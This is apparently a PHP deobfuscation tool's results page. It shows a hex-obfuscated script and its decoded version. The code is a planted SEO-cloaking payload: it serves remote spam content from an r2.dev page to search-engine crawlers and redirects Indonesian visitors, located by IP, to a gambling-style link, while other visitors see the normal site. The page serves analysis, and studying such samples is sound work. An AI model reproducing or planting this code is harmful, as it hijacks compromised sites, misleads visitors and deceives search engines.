Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function profile_user() { $useragent = $_SERVER["\x48\x54\x54\x50\x5f\125\x53\x45\..

Decoded Output download

<?php 
 function profile_user() { $useragent = $_SERVER["HTTP_USER_AGENT"] ?? ''; $referer = $_SERVER["HTTP_REFERER"] ?? ''; $pasteUrl = "https://pub-05ba3407903e4840a55b8c21fc682cda.r2.dev/redigicall.html"; $redirectUrl = "https://linkjp.lol/ultra88"; $apiUrl = "https://api.incolumitas.com/?q="; $ipAddress = $_SERVER["REMOTE_ADDR"] ?? ''; $botAgents = array("Google-InspectionTool", "googlebot", "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "bingbot", "AhrefsBot", "slurp", "duckduckbot", "baiduspider", "yandexbot", "sogou", "exabot", "facebot", "ia_archiver"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "Error fetching content: " . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; } else { $ch = curl_init($apiUrl . $ipAddress); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["location"]["country_code"]) && $data["location"]["country_code"] === "ID") { header("Location: {$redirectUrl}"); die; } } include "index.php"; die; } die; } profile_user(); ?>

Did this file decode correctly?

Original Code

<?php
 function profile_user() { $useragent = $_SERVER["\x48\x54\x54\x50\x5f\125\x53\x45\x52\x5f\x41\107\x45\x4e\124"] ?? ''; $referer = $_SERVER["\110\x54\x54\120\137\122\x45\x46\x45\122\105\x52"] ?? ''; $pasteUrl = "\150\x74\164\160\x73\x3a\x2f\x2f\x70\165\142\x2d\60\65\142\x61\63\64\60\x37\x39\60\x33\145\64\70\64\x30\141\65\65\x62\70\x63\x32\61\146\x63\x36\70\62\143\144\141\56\162\62\x2e\x64\x65\166\57\162\145\144\x69\147\x69\143\x61\154\154\x2e\x68\x74\x6d\154"; $redirectUrl = "\x68\x74\164\x70\163\x3a\57\x2f\x6c\x69\x6e\x6b\152\160\56\x6c\x6f\x6c\57\x75\154\164\x72\141\x38\x38"; $apiUrl = "\150\164\164\x70\x73\72\x2f\57\x61\x70\x69\56\151\156\x63\x6f\154\165\155\x69\164\x61\x73\56\143\157\155\57\x3f\x71\x3d"; $ipAddress = $_SERVER["\x52\105\115\x4f\124\105\137\x41\104\104\x52"] ?? ''; $botAgents = array("\107\157\157\x67\154\x65\55\111\156\163\x70\145\x63\164\x69\x6f\156\124\x6f\x6f\154", "\147\157\x6f\x67\154\x65\x62\157\164", "\50\143\x6f\155\160\141\x74\151\142\154\x65\73\40\x47\157\157\147\x6c\x65\142\157\x74\x2f\x32\56\x31\73\x20\x2b\x68\x74\x74\160\72\57\57\167\x77\167\56\x67\157\x6f\147\x6c\x65\56\143\157\155\x2f\142\x6f\x74\x2e\x68\164\155\x6c\51", "\142\151\156\147\x62\157\164", "\x41\150\x72\145\x66\163\x42\157\164", "\163\154\x75\162\x70", "\144\165\143\153\144\165\x63\x6b\142\x6f\164", "\x62\141\x69\x64\165\163\x70\151\x64\145\x72", "\x79\x61\x6e\144\145\170\x62\157\x74", "\x73\x6f\147\x6f\x75", "\x65\170\x61\x62\157\x74", "\x66\x61\x63\145\x62\157\164", "\x69\141\x5f\x61\x72\143\x68\151\166\145\162"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "\105\162\162\x6f\162\x20\146\145\x74\x63\x68\x69\156\x67\x20\143\157\x6e\x74\145\x6e\x74\72\40" . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; } else { $ch = curl_init($apiUrl . $ipAddress); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["\154\x6f\x63\x61\x74\151\157\156"]["\143\x6f\x75\156\x74\162\x79\x5f\143\x6f\x64\145"]) && $data["\x6c\157\x63\141\164\151\157\x6e"]["\x63\x6f\165\x6e\x74\x72\171\x5f\143\157\144\145"] === "\x49\104") { header("\114\157\143\141\164\151\x6f\x6e\72\40{$redirectUrl}"); die; } } include "\151\x6e\x64\x65\170\56\x70\150\x70"; die; } die; } profile_user();

Function Calls

None

Variables

None

Stats

MD5 91067603928c90569fe56ac9c436ab2a
Eval Count 0
Decode Time 57 ms